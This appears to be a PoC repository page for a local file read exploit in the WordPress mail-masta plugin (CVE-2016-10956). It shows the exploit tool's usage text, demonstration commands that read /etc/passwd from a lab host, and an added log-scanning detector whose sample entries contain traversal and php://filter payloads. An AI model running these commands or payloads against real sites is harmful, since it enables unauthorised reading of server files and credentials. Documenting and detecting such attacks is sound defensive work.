PoC details: 7ac8f67562ba0104cad55cf9cfd2aaf13371200f

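Related vulnerability
Title: WordPress mail-masta plugin input validation error vulnerability (CVE-2016-10956)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It supports setting up personal blog sites on servers running PHP and MySQL. mail-masta is an e-mail plugin used with it. An input validation error vulnerability exists in version 1.0 of the WordPress mail-masta plugin. The vulnerability stems from the network system or product not correctly validating input data.
Description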
MailMasta wordpress plugin Local File Inclusion vulnerability (CVE-2016-10956)
Introduction
# Mail Masta - Local File Read (CVE-2016-10956)


The mail-masta plugin 1.0 for WordPress has a local file read vulnerability in `count_of_send.php` and `csvexport.php`.

![](./.github/3.png)
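
For defenders, requests of this kind leave traces in web server access logs. The following added example (not part of the original README or of the author's tool) scans Combined Log Format lines for requests to the two affected scripts whose query values decode to an absolute path, a traversal sequence or a PHP stream wrapper. The log lines, the `DIR` path segment and the `PARAM` parameter name are constructed placeholders, and the path-like heuristic is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script names are from the advisory text above; the plugin slug is from its wordpress.org URL.
SCRIPT = re.compile(r"/wp-content/plugins/mail-masta/(?:.*/)?(?:count_of_send|csvexport)\.php$", re.I)
# Heuristic (assumption): a value that is a PHP stream wrapper, an absolute path or a traversal.
PATH_LIKE = re.compile(r"^(?:php|file|phar|zip|data|expect)://|^/|^[a-z]:[\\/]|\.\.[\\/]", re.I)
# Client, request target and status from a Combined Log Format line.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})\b')

# Constructed sample log; DIR and PARAM are placeholders, the page names neither.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp/wp-content/plugins/mail-masta/DIR/count_of_send.php?PARAM=/etc/passwd HTTP/1.1" 200 1532
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /wp/wp-content/plugins/mail-masta/DIR/csvexport.php?PARAM=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fetc%2Fpasswd HTTP/1.1" 200 2048
203.0.113.9 - - [01/Jan/2024:10:05:00 +0000] "GET /wp/wp-content/plugins/mail-masta/DIR/csvexport.php?PARAM=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0
192.0.2.10 - - [01/Jan/2024:10:06:00 +0000] "GET /wp/wp-login.php HTTP/1.1" 200 4021
192.0.2.10 - - [01/Jan/2024:10:07:00 +0000] "GET /wp/wp-content/plugins/mail-masta/DIR/csvexport.php?PARAM=42 HTTP/1.1" 200 88
"""


def scan(log_text):
    """Return (client, script, parameter, decoded_value, verdict) per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path)
        if not SCRIPT.search(path):
            continue
        # parse_qsl percent-decodes, so encoded traversal and wrappers are normalised first.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if PATH_LIKE.search(value):
                verdict = "likely read" if status == "200" else "attempt"
                findings.append((client, path.rsplit("/", 1)[-1], name, value, verdict))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

Access logs record only the query string, so parameters sent in a request body need WAF or application-level logging to be visible. Double-encoded values (`%252e`) are decoded only once here.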

## Usage

```
$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)

usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode
  -s, --only-success    Only print successful read file attempts.
  -t TARGET_URL, --target TARGET_URL
                        URL of the wordpress to connect to.
  -f FILE, --file FILE  Remote file to read.
  -F FILELIST, --filelist FILELIST
                        File containing a list of paths to files to read remotely.
  -D DUMP_DIR, --dump-dir DUMP_DIR
                        Directory where the dumped files will be stored.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -r, --raw             Raw dump of the file without php base64 wrapper (default: False)

```

## Demonstration

### Read a specific remote file

```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd
```

![](./.github/1.png)

### Read specific remote files from a wordlist

```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist
```

![](./.github/3.png)

### Read specific remote files from a wordlist and only print found files

```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success
```

![](./.github/4.png)

## References
 - https://nvd.nist.gov/vuln/detail/CVE-2016-10956
 - https://cxsecurity.com/issue/WLB-2016080220
 - https://wordpress.org/plugins/mail-masta/#developers
 - https://wpvulndb.com/vulnerabilities/8609
File snapshot

```
[4.0K] /data/pocs/7ac8f67562ba0104cad55cf9cfd2aaf13371200f
├── [4.2K] CVE-2016-10956_mail_masta.py
├── [4.0K] poc_environnement
│   ├── [ 843] Dockerfile
│   ├── [ 151] Makefile
│   ├── [1.6M] plugin-mail-masta-1.0.zip
│   └── [ 536] wpscan.txt
└── [2.4K] README.md

1 directory, 6 files
```